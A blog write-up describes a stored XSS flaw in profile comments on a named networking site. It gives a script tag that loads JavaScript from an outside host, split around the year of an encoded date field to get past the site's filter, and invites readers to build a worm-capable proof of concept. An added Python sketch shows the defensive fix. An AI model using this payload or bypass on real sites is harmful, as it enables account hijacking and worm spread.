yousuckirule()
target site:yousuckirule.com
Well, another networking site falls victim to XSS. The site seems to have some filters in place that do not try changing user input but instead just redirect you to a page with a static message on screen stating JavaScript can’t be used. So far so good. This happens on a lot of the fields where input can be placed by the user when posting comments on people’s profiles.
When you post a comment, I have noticed that the date is HTML encoded, and when posted on the page it becomes unencoded. Would this be the vector I wanted? We try placing script tags in alongside the date when it’s posted (encoded and unencoded), but both times we are redirected to the no JavaScript page. Hmmm, well, don’t give up there.
Let’s try another way. Instead of <script>alert(1);</script>, this time I gave <script src=http://lab.v-wall.co.uk/i.js></script> a try ... still the same outcome. Don’t give up there: instead of placing it all together, place the first half <script src=http://lab.v-wall.co.uk/i.js> in front of the year (in our date that is being posted) and the ending </script> tag after the date. This seems to bypass whatever filter they have in place.
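From the defending side, the date field above fails because it is decoded and echoed without being treated as a date. The sketch below is an added example, not code from the site or from this post: it shows that flawed pattern next to a stricter handler. The function names, the date format and the sample value are assumptions made for illustration.

```python
import html
from datetime import datetime

DATE_FORMAT = "%d/%m/%Y"  # assumed format; the post does not say what the site uses

# Constructed sample: an HTML-encoded date with inert markup wrapped around the year.
SAMPLE_DATE = "12/03/&lt;b&gt;2008&lt;/b&gt;"


def render_comment_unsafe(date_field: str, body: str) -> str:
    """Flawed pattern: the client-supplied date is decoded and written out as-is."""
    decoded = html.unescape(date_field)
    return f'<div class="comment"><span class="date">{decoded}</span> {html.escape(body)}</div>'


def parse_date_strict(date_field: str) -> datetime:
    """Decode first, then accept only a value that parses as a date (else ValueError)."""
    return datetime.strptime(html.unescape(date_field).strip(), DATE_FORMAT)


def render_comment_safe(date_field: str, body: str) -> str:
    """Validate by type, re-serialise from the parsed value, escape at output."""
    try:
        shown = parse_date_strict(date_field).strftime(DATE_FORMAT)
    except ValueError:
        # Better still: ignore the client value and stamp the comment server-side.
        shown = "unknown date"
    return f'<div class="comment"><span class="date">{html.escape(shown)}</span> {html.escape(body)}</div>'


if __name__ == "__main__":
    print(render_comment_unsafe(SAMPLE_DATE, "nice profile"))
    print(render_comment_safe(SAMPLE_DATE, "nice profile"))
    print(render_comment_safe("12/03/2008", "nice profile"))
```

Because the safe handler rebuilds the displayed string from the parsed date rather than from the submitted text, nothing placed around the year survives, whatever a pattern filter further up did or did not catch.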
So there you have it: another networking site that could be used for another XSS worm, who knows.
There would have been a PoC to go with this post, but there is too much going off in RL to get the PoC working to a good stage. Oh well, if anyone does make one, leave a comment; it would be interesting to see.